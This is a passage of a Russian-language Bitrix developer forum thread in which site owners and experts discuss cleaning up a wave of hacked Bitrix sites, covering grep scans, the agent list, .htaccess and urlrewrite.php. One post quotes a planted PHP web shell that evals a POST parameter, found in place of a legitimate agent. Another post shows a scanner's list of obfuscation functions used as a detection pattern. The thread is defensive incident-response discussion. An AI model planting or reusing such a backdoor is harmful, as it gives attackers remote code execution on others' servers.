Разработчикам

Взломаны сайты в честь дня конституции украины

RSS

Пользователь 298542

Заглянувший

Сообщений: 20 Баллов: 1 Регистрация: 05.12.2014

#626

17.03.2023 15:53:59

Цитата
написал: Вопрос к тем у кого сломали сайты.У вас указана константа BX_TEMPORARY_FILES_DIRECTORY (путь к временной папке аплоада) в dbconn.php и указанная папка находится не в папке самого сайта?

Ноль ответов. Ни кто не читает предыдущие посты в теме?

Пользователь 1329903

Эксперт

Сообщений: 299 Баллов: 45 Регистрация: 15.08.2017

#627

17.03.2023 16:25:46

Цитата
xRayDev написал: .У вас указана константа BX_TEMPORARY_FILES_DIRECTORY (путь к временной папке аплоада) в dbconn.php и указанная папка находится не в папке самого сайта?

Чистил сайты и с директорией .bx_temp за пределами сайта и без этого параметра. И то и другое ломают.

Пользователь 7125764

Заглянувший

Сообщений: 16 Баллов: 1 Регистрация: 15.03.2023

#628

17.03.2023 18:57:45

Цитата

написал:
эта команда для запуска в консоли на сервере в домашней директории сайта (операционная система linux семейства) как правило по ssh протоколуесли у вас веб сервер под Виндой найдите аналог - смысл поискать во всех файлах вхождение str_rot13

попросил прогнать код ТП хостинга, вот их ответ:

Вот скрипты которые содержат str_rot13

#grep -rl str_rot13
bitrix/modules/main/lib/search/content.php
bitrix/modules/main/classes/general/vuln_scanner.php
bitrix/modules/bitrix.xscan/include.php
bitrix/modules/bitrix.xscan/include_fork.php

Вот результат команды
# grep -r str_rot13
bitrix/modules/main/lib/search/content.php: return str_rot13($token);
bitrix/modules/main/classes/general/vuln_scanner.php: 'str_rot13',
bitrix/modules/bitrix.xscan/include.php: static $functions = '(?:parse_str|hex2bin|str_rot13|base64_decode|url_decode|str_replace|str_ireplace|preg_replace|move_uploaded_file)';
bitrix/modules/bitrix.xscan/include_fork.php: static $functions = '(?:parse_str|hex2bin|str_rot13|base64_decode|url_decode|str_replace|str_ireplace|preg_replace|move_uploaded_file)';
bitrix/modules/bitrix.xscan/include_fork.php: static $cryptors = ['rot13', 'str_rot13', 'base32_decode', 'base64_decode', 'gzinflate', 'unserialize',

что с этим делать?

Пользователь 13618 Эксперт Сообщений: 1336 Баллов: 225 Регистрация: 05.04.2011 Сертифицированный партнер	#629 17.03.2023 19:07:11 Антон АК, тут ничего подозрительного. Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 13618 Эксперт Сообщений: 1336 Баллов: 225 Регистрация: 05.04.2011 Сертифицированный партнер	#630 17.03.2023 19:08:24 Антон АК, у Вас какая проблема? Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 7125764

Заглянувший

Сообщений: 16 Баллов: 1 Регистрация: 15.03.2023

#631

17.03.2023 19:12:02

Цитата
написал: Антон АК, у Вас какая проблема?

Алексей, спасибо за ответ!
У меня всё началось с этого
https://dev.1c-bitrix.ru/community/forums/messages/forum6/topic147346/message727026/#message727026
я пролечил/удалил, обновил и CMS и версию PHP, теперь вирусов нет, я беспокоился что внутри сайта остались PHP коды, которые сами по себе не являются вредоносными и не сканируются как угроза, но могут подкачать опять бэкдоры, поэтому попросил ТП хостинга прогнать код, который вы выкладывали выше и выложил свой результат.

Пользователь 4644304 Заглянувший Сообщений: 6 Баллов: 1 Регистрация: 01.10.2020	#632 17.03.2023 19:23:40 Заметил ещё что Айболит и Имунфай вообще не видят части вирусных файлов, так что я бы не ориентировался на их результат как на последнюю инстанцию.

Пользователь 13618

Эксперт

Сообщений: 1336 Баллов: 225 Регистрация: 05.04.2011

Сертифицированный партнер

#633

18.03.2023 10:51:33

Цитата

Антон АК написал:

Цитата
написал: Антон АК , у Вас какая проблема?

Алексей, спасибо за ответ!
У меня всё началось с этого
https://dev.1c-bitrix.ru/community/forums/messages/forum6/topic147346/message72702 6/#message727026
я пролечил/удалил, обновил и CMS и версию PHP, теперь вирусов нет, я беспокоился что внутри сайта остались PHP коды, которые сами по себе не являются вредоносными и не сканируются как угроза, но могут подкачать опять бэкдоры, поэтому попросил ТП хостинга прогнать код, который вы выкладывали выше и выложил свой результат.

чтобы было понимание подкачаются бэкдоры или нет я бы посоветовал паблик загнать в git и сделать снимок ядра средствами движка
ну и конечно же забэкапиться пока чисто

либо без гита - сделать снимок ядра и паблика

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 1329903

Эксперт

Сообщений: 299 Баллов: 45 Регистрация: 15.08.2017

#634

20.03.2023 16:22:17

Не забывайте смотреть в список агентов.

На одном из сайтов заметил, что агент №2 заменён

Код
php /home/bitrix/www/bitrix/admin/sender_unceremoniously.php

Содержимое файла

Код
<?php I1c7f1b6e(@$_POST['483c40f']); function I1c7f1b6e($b10b7d0e0ec){ @eval($b10b7d0e0ec); } ?>

Вместо него должен быть

Код
CUser::CleanUpHitAuthAgent();

Пользователь 89140

Заглянувший

Сообщений: 17 Баллов: 2 Регистрация: 18.04.2011

#635

21.03.2023 09:19:01

Список агентов вообще полезно просматривать.

Даже без вирусов там можно обнаружить ежеминутные вызовы десятка скриптов от модулей Landing, MessageService, Calendar - несмотря на то, что они не установлены в системе вовсе.

Пользователь 2624465

Заглянувший

Сообщений: 6 Регистрация: 21.09.2020

#636

21.03.2023 16:00:42

подскажите пожалуйста
надоело удалять зараженные фацлы в корне сайта
в папке админ они создаваться перестали

сегодня сайт ломанули он перестал открываться
востановил бекап все включилось

сколько стоит решить этот вопрос раз и на всегда и кто может в этом помочь?

Пользователь 13618 Эксперт Сообщений: 1336 Баллов: 225 Регистрация: 05.04.2011 Сертифицированный партнер	#637 21.03.2023 16:02:40 Станислав Х, обновления актуальны? Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 47602

Посетитель

Сообщений: 29 Баллов: 4 Регистрация: 24.08.2009

#638

22.03.2023 18:37:42

Цитата

написал:
подскажите пожалуйстанадоело удалять зараженные фацлы в корне сайтав папке админ они создаваться перестали сегодня сайт ломанули он перестал открываться востановил бекап все включилось сколько стоит решить этот вопрос раз и на всегда и кто может в этом помочь?

аналогично.. рассмотрел бы помощь в этом вопросе. лицензия актуальна, обновления, к сожалению, весьма старые

Пользователь 577 Постоянный посетитель Сообщений: 198 Баллов: 37 Регистрация: 10.07.2004	#639 24.03.2023 17:02:04 У меня вылечилось удалением /bitrix/tools/spread.php ну и естественно удалением всего зараженного кода. Просто spread.php не определялся как проблемное место. -- С уважением Илья Щербаков.

Пользователь 7155480

Заглянувший

Сообщений: 5 Регистрация: 24.03.2023

#640

24.03.2023 20:57:48

Всех приветствую! На днях положили сайт, в индексном файле левый код был. Убрал, вошёл в панель управления Битрикса, там любая кнопка выдавала 403 ошибку, проблема была в .htaccess Теперь сайт работает, админ панель работает, ссылки на сайте работают, но вот когда в каталоге выбираешь товар - в адресной строке появляется нужный каталог, но грузится всегда главная страница, в чем может быть дело ещё? Спасибо

Пользователь 6397090

Заглянувший

Сообщений: 8 Регистрация: 29.06.2022

#641

24.03.2023 21:04:26

Цитата

написал:
Всех приветствую! На днях положили сайт, в индексном файле левый код был. Убрал, вошёл в панель управления Битрикса, там любая кнопка выдавала 403 ошибку, проблема была в .htaccess Теперь сайт работает, админ панель работает, ссылки на сайте работают, но вот когда в каталоге выбираешь товар - в адресной строке появляется нужный каталог, но грузится всегда главная страница, в чем может быть дело ещё? Спасибо

Добрый вечер!

В корне должен быть .htaccess такого вида для обработки ЧПУ Битриксом.
Было подобное, теперь на старых проектах держу копию оригинального .htaccess как .htaccess.restore

Код

<IfModule mod_rewrite.c>
  Options +FollowSymLinks
  RewriteEngine On

  RewriteCond %{REQUEST_FILENAME} !-f
  RewriteCond %{REQUEST_FILENAME} !-l
  RewriteCond %{REQUEST_FILENAME} !-d
  RewriteCond %{REQUEST_FILENAME} !/bitrix/urlrewrite.php$
  RewriteRule ^(.*)$ /bitrix/urlrewrite.php [L]
  RewriteRule .* - [E=REMOTE_USER:%{HTTP:Authorization}]
</IfModule>

Пользователь 1305583 Заглянувший Сообщений: 22 Баллов: 2 Регистрация: 03.08.2017	#642 26.03.2023 04:57:17 Проверьте еще помойку /upload/temp/ Если там есть папка типа BXTEMP-2023-03-XX - удалите. Если ваш хостер таймвеб, то все свои запущенные процессы можно прибить через их консоль ssh: killall -9 apache2 (это вместо перезапуска)

Пользователь 2624465

Заглянувший

Сообщений: 6 Регистрация: 21.09.2020

#643

26.03.2023 11:09:26

Цитата
написал: Станислав Х, обновления актуальны?

к сожалению нет.

+ решение хамелеон не обновлялось
9 ИМ стоит.

Пользователь 7155480

Заглянувший

Сообщений: 5 Регистрация: 24.03.2023

#644

26.03.2023 13:18:24

Цитата

написал:

Цитата

Код

  < IfModule   mod_rewrite.c > 
  Options +FollowSymLinks
  RewriteEngine On

  RewriteCond %{REQUEST_FILENAME} !-f
  RewriteCond %{REQUEST_FILENAME} !-l
  RewriteCond %{REQUEST_FILENAME} !-d
  RewriteCond %{REQUEST_FILENAME} !/bitrix/urlrewrite.php$
  RewriteRule ^(.*)$ /bitrix/urlrewrite.php [L]
  RewriteRule .* - [E=REMOTE_USER:%{HTTP:Authorization}]
 </ IfModule >

Благодарю за ответ, но не помогло. Что еще проверить? Или где почитать об ээтом? У меня в папке /bitix/ лежит urlrewrite.php с таким содержанием:

Код
<? include_once($_SERVER['DOCUMENT_ROOT'].'/bitrix/modules/main/include/urlrewrite.php'); if(file_exists($_SERVER['DOCUMENT_ROOT'].'/404.php')) include_once($_SERVER['DOCUMENT_ROOT'].'/404.php'); ?>

Пользователь 7162848

Заглянувший

Сообщений: 2 Регистрация: 28.03.2023

#645

28.03.2023 14:39:54

Цитата
написал: Заметил ещё что Айболит и Имунфай вообще не видят части вирусных файлов, так что я бы не ориентировался на их результат как на последнюю инстанцию.

Подобные скрипты могут быть только сигнализаторами, что у вас появились зверята на сайте или сервере.В моей практике люди губили свои сайты (У тех у кого не были бэкпы) доверяя подобным скриптам, т.к. вредоносные кода оставались и завершали свои дела. Например ставили левые ссылки скрытые, после поисковики сайт понижали, удалил контент и тд.

Цитата

написал:
подскажите пожалуйста
надоело удалять зараженные фацлы в корне сайта
в папке админ они создаваться перестали

сегодня сайт ломанули он перестал открываться
востановил бекап все включилось

сколько стоит решить этот вопрос раз и на всегда и кто может в этом помочь?

Обращайтесь поможем вылечить сайт и защититься, телеграм - doktorsaitov

Удаление вирусов и защита сайта

Пользователь 6397090

Заглянувший

Сообщений: 8 Регистрация: 29.06.2022

#646

28.03.2023 15:03:20

Цитата

написал:

Цитата

написал:

Цитата

Код

    <  IfModule     mod_rewrite.c  >  
  Options +FollowSymLinks
  RewriteEngine On

  RewriteCond %{REQUEST_FILENAME} !-f
  RewriteCond %{REQUEST_FILENAME} !-l
  RewriteCond %{REQUEST_FILENAME} !-d
  RewriteCond %{REQUEST_FILENAME} !/bitrix/urlrewrite.php$
  RewriteRule ^(.*)$ /bitrix/urlrewrite.php [L]
  RewriteRule .* - [E=REMOTE_USER:%{HTTP:Authorization}]
  </  IfModule  >

Код

   <? 
 include_once ( $_SERVER [ 'DOCUMENT_ROOT' ]. '/bitrix/modules/main/include/urlrewrite.php' );
 if (file_exists( $_SERVER [ 'DOCUMENT_ROOT' ]. '/404.php' ))
    include_once ( $_SERVER [ 'DOCUMENT_ROOT' ]. '/404.php' );
 ?>

А в корне urlrewrite.php содержит правила обработки адреса Вашего каталога?

Пользователь 7125764

Заглянувший

Сообщений: 16 Баллов: 1 Регистрация: 15.03.2023

#647

31.03.2023 16:36:17

момента заражения и лечения сайта всё было хорошо примерно неделю, сейчас ImunifyAV выдал следующее:

ID	Тип	Действие	Вердикт	Файл	Размер	Изменено
1	SRV	в исключения	SMW-SA-04693-php.spam.mailer-2	/bitrix/modules/bitrix.xscan/lang/ru/admin/help.php ...... BX%7}UnTZ}*5PXm '/</pre><br><pre class="xscan-code">if(isset($_POST[...	7 KB	2023-03-22 16:13:09

Пользователь 47602 Посетитель Сообщений: 29 Баллов: 4 Регистрация: 24.08.2009	#648 31.03.2023 17:15:36 Антон АК, не подскажите вкратце, как этот антивирус на БВМ установить? может где понятная инструкция есть? а то везде только про "установку" в ispmanager да cpanel..

Пользователь 7125764

Заглянувший

Сообщений: 16 Баллов: 1 Регистрация: 15.03.2023

#649

31.03.2023 17:20:31

Цитата
написал: Антон АК, не подскажите вкратце, как этот антивирус на БВМ установить? может где понятная инструкция есть? а то везде только про "установку" в ispmanager да cpanel..

это со стороны хостера (infobox), в панели управления есть антивирус.

Пользователь 2624465 Заглянувший Сообщений: 6 Регистрация: 21.09.2020	#650 01.04.2023 18:48:17 подскажите что должно быть в оригинальном файле urlrewrite.php

Взломаны сайты в честь дня конституции украины

Продукты

Управление сайтом

Битрикс24

Интернет-магазин + CRM

Решения

Для интернет-магазинов

Каталог готовых решений

Внедрение

Выбрать партнера

Проверить партнера

Стать партнером